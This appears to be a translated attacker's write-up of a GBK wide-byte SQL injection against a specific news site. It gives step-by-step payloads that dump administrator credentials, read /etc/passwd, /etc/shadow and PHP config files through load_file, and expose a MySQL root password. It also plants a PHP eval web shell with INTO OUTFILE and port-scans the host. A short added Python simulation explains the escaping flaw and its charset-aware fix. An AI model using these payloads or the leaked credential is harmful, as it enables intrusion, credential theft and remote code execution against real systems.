Site: http://www.2cto.com (stands in for the target site; it is not the site that was tested)
Injection point: http://www.bkjia.com/news_view.php?id=94
Submitting %bf' produced a database error, which shows that a wide-byte injection exists.
%bf%27 and 1=1%23 then returns the page normally.
%bf%27 order by 10%23
also returns normally: the current query has 10 columns.
Next step:
%bf%27%20and%201=2%20union%20select%
The result is valid: positions 3 and 9 are echoed on the page.
database() returns international.
Dump the tables directly.
Use the dual table to check whether information_schema.tables is readable.
3 and 9 come back, so the query succeeded: information_schema.tables is available.
Then replace 3 with table_name and add the condition where TABLE_NAME = 0x696e7465726e6174696f6e616c (the string international in hex).
The table name i_admin comes back, which is tentatively the table holding the administrator accounts.
Use limit to enumerate the remaining tables:
i_admin
i_application_configs
i_application_information_step1
i_application_information_step2
i_application_information_step3
i_application_userbasic
i_count
i_department
... (the rest were not dumped)
Next, dump the columns of i_admin:
1,2,3,4,5,6,7,8,9,10 from information_schema.COLUMNS
returns normally.
i_admin in hex is 0x695F61646D696E.
With the where condition added, the column uid comes back.
Adding limit lists all the columns:
uid
m_id
username
password
name
state
All column names of i_admin are now known.
Selecting username and password returns an error (the words "username" and "password" themselves seem to trigger it), while uid and state return normally.
Hex encoding gets around this: query hex(username) and hex(password) instead, and decode the hex that comes back.
At this point the administrator back-end passwords have been obtained.
-----------------
Another approach
This works because the MySQL user is root, so files can be read with load_file():
load_file(0x2F6574632F706173737764) // reads /etc/passwd
Returns the whole of /etc/passwd. It shows, among others, the accounts mysql (shell /bin/bash), apache, zf_job and syyy, the last two with home directories under /opt/www_application.
Website directory
Read /opt/www_application/xxxxx/news_view.php, with the path given in hex:
replace(load_file(<path in hex>), char(60), char(32))
char(60) is '<' and char(32) is a space, so the PHP source is displayed in the page instead of being swallowed as HTML tags. It returns:
<?php
include_once('global.php');
if (isset($_GET[id])) {
    $sql = "update i_newsbase set hits=hits+1 where id=".$_GET[id];
    mysql_query($sql);
    $query_view = mysql_query("SELECT * FROM `i_newsbase` where `id`='$_GET[id]';");
    $row_view = mysql_fetch_array($query_view);
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=GB2312" />
<title><?=$row_view[title]?> - <?=$row_arr[websitename]?></title>
<?php include_once('header.php'); ?>
<!--contene-->
<div id="contene_"><div id="box_l"><div id="box_r"><div id="l_box"><div class="h_700"><div class="blue"><h3>Focus News</h3></div>
<?php $query_news = mysql_query("SELECT * FROM `i_newsbase` order by `date_time` desc limit 12");
while ($row_news = mysql_fetch_array($query_news)) { ?>
<p class="p"><span><a title="<?=$row_news[title]?>" href="news_view.php?id=<?=$row_news[id]?>"><?php if (strlen($row_news[title]) > 40) { echo $db->titlesubstr($row_news[title])."..."; } else echo $row_news[title]; ?></a></span></p>
<?php } ?>
</p></div>
<div id="box_l_"><div id="box_r_"><div id="r_box"><div class="blue"><h3><a href="index.php">Home</a><span>»</span><a href="news_list.php">News</a></h3></div><div class="text"><div class="title">
<?php $query_all = mysql_query("SELECT * FROM `i_newsbase` as `A`, `i_newscontent` as `B` where `A`.`id`=`B`.`nid` and `A`.`id`='$_GET[id]' limit 1;");
$row_all = mysql_fetch_array($query_all); ?>
<div align="center"><?=$row_all[title]?></div><p></p><p class="font" align="center">Date: <?=date("Y-m-d", $row_all[date_time])?></p></div>
<?=$row_all[content]?>
</div><div class="clear"></div><div class="clear"></div><div id="ad"></div></div>
<?php include_once('footer.php'); ?>
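As an added example (not from the original write-up), this Python simulation shows why the %bf' probe in step one gets past byte-level escaping: news_view.php above concatenates $_GET[id] into the query, and db_config.php sets the connection charset to GBK. It assumes that magic_quotes_gpc or an equivalent addslashes() filter was escaping the quote, which is the usual reason a bare ' fails while %bf' works; the function names and the probe bytes are constructed here, and the last function shows escaping done after decoding, which is what mysql_real_escape_string() does once mysql_set_charset() is in effect.

```python
# Added example, not from the write-up: simulates why the probe %bf' defeats
# byte-level escaping when the MySQL connection charset is GBK (db_config.php
# sets "GBK"). Assumes magic_quotes_gpc/addslashes() was escaping the quote,
# the usual reason a bare ' fails while %bf' works. Runs offline, no database.

def addslashes(data: bytes) -> bytes:
    """PHP addslashes(): a backslash before ', ", \\ and NUL, charset-blind."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def live_quotes(escaped: bytes, charset: str) -> int:
    """Count single quotes MySQL would still treat as string delimiters.
    The server decodes in the connection charset first; under GBK the pair
    0xBF 0x5C is one two-byte character, so the inserted backslash is
    swallowed and the quote behind it stays live."""
    text = escaped.decode(charset, errors="replace")
    count, i = 0, 0
    while i < len(text):
        if text[i] == "\\":
            i += 2  # a surviving backslash escapes the next character
            continue
        if text[i] == "'":
            count += 1
        i += 1
    return count

def charset_aware_escape(data: bytes, charset: str) -> bytes:
    """Escape after decoding in the connection charset, so a backslash can
    never be absorbed into a multibyte character: what mysql_real_escape_string()
    does once mysql_set_charset() is set. Prepared statements avoid it entirely."""
    text = data.decode(charset, errors="replace")
    for ch in ("\\", "'", '"'):  # backslash first so new escapes are not doubled
        text = text.replace(ch, "\\" + ch)
    return text.encode(charset, errors="replace")

# Constructed input: the URL-decoded form of the probe %bf%27 used above.
PROBE = b"\xbf\x27"

if __name__ == "__main__":
    naive = addslashes(PROBE)  # b"\xbf\x5c\x27"
    print("GBK, byte-level escape:   ", live_quotes(naive, "gbk"))    # 1, quote is live
    print("UTF-8, byte-level escape: ", live_quotes(naive, "utf-8"))  # 0
    print("GBK, charset-aware escape:", live_quotes(charset_aware_escape(PROBE, "gbk"), "gbk"))  # 0
```

The same mechanism is why a connection charset declared only in the DSN or via SET NAMES, without telling the client library, leaves the escaping function charset-blind.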
Then read global.php:
/opt/www_application/xxxxx/global.php (path given in hex)
replace(load_file(<path in hex>), char(60), char(32))
Returns:
<?php
include_once('./configs/config.php');
include_once('./common/mysql.class.php');
include_once('./common/action.class.php');
include_once('./common/page.class.php');
$db = new action($mydbhost, $mydbuser, $mydbpw, $mydbname, ALL_PS, $mydbcharset);
$query_config = $db->query("SELECT * FROM `i_config`");
while ($row_config = $db->fetch_array($query_config)) {
    $row_arr[$row_config[name]] = $row_config[values];
    $row_eng[$row_config[name]] = $row_config[xxxxx_values];
}
?>
Read ./configs/config.php. Candidate paths:
/opt/www_application/xxxxx/configs/config.php
/opt/www_application/configs/config.php
replace(load_file(<path in hex>), char(60), char(32))
returns NULL ........ the file does not exist.
/opt/www_application/xxxxx/configs/config.php (path given in hex)
replace(load_file(<path in hex>), char(60), char(32))
Returns:
<?php
include_once('db_config.php');
include_once('variable_config.php');
/****************************************************************************
 Upload image parameter description:
 $max_file_size: size limit of the uploaded file, in bytes
 $destination_folder: upload path
 $watermark: whether to add a watermark (1 adds it, anything else does not)
 Usage:
 1. In php.ini, remove the ";" in front of the line "extension=php_gd2.dll", since the GD library is used.
 2. Change extension_dir= to the directory where your php_gd2.dll is located.
 ****************************************************************************/
$uptypes = array('image/jpg', 'image/jpeg', 'image/png', 'image/pjpeg', 'image/gif', 'image/bmp', 'image/x-png'); // allowed upload types
$max_file_size = 2000000;           // upload size limit, in bytes
$destination_folder = "uploading/"; // upload path
$watermark = 1;       // add a watermark (1 = yes, anything else = no)
$watertype = 1;       // watermark type (1 = text, 2 = image)
$waterposition = 1;   // watermark position (1 lower left, 2 lower right, 3 upper left, 4 upper right, 5 center)
$waterstring = "TY";  // watermark text
// (variable name garbled in the dump) = "xplore.gif"; // watermark image
$imgpreview = 1;      // generate a preview image (1 = yes, anything else = no)
$imgpreviewsize = 1/1; // thumbnail ratio
?>
/opt/www_application/xxxxx/configs/db_config.php (path given in hex)
replace(load_file(<path in hex>), char(60), char(32))
Returns:
<?php
// This file stores the variables for the user database
$mydbhost = "localhost";
$mydbuser = "root";
$mydbpw = "xyw1120";
$mydbname = "international";
$mydbcharset = "GBK";
?>
Obtained: the MySQL account root with password xyw1120.
/opt/www_application/xxxxx/1.php
select "dddd" into outfile '/var/www/data/suddytest.php'
select '<?php eval($_POST[cmd])?>' into outfile 'D:/PHPnow-1.5.4/htdocs/index2.php'
select '<?php echo "HelloWorld";?>' into outfile '/opt/www_application/xxxxx/index2.php'
/etc/vpn/server.conf
0x2F6574632F76706E2F7365727665722E636F6E66
replace(load_file(0x2F6574632F76706E2F7365727665722E636F6E66), char(60), char(32))
Port scan:
80 open
111 open
1723 open
3306 open
1723 is the VPN (PPTP) port, which gives another angle ..... next step.
Read /etc/shadow
0x2f6574632f736861646f77
replace(load_file(0x2f6574632f736861646f77), char(60), char(32))
It returns the contents of /etc/shadow: root, bin, zf_job, angang523409 and syyy have $1$ (MD5-crypt) password hashes, and the remaining accounts are locked (* or !!).
By 137747998@qq.com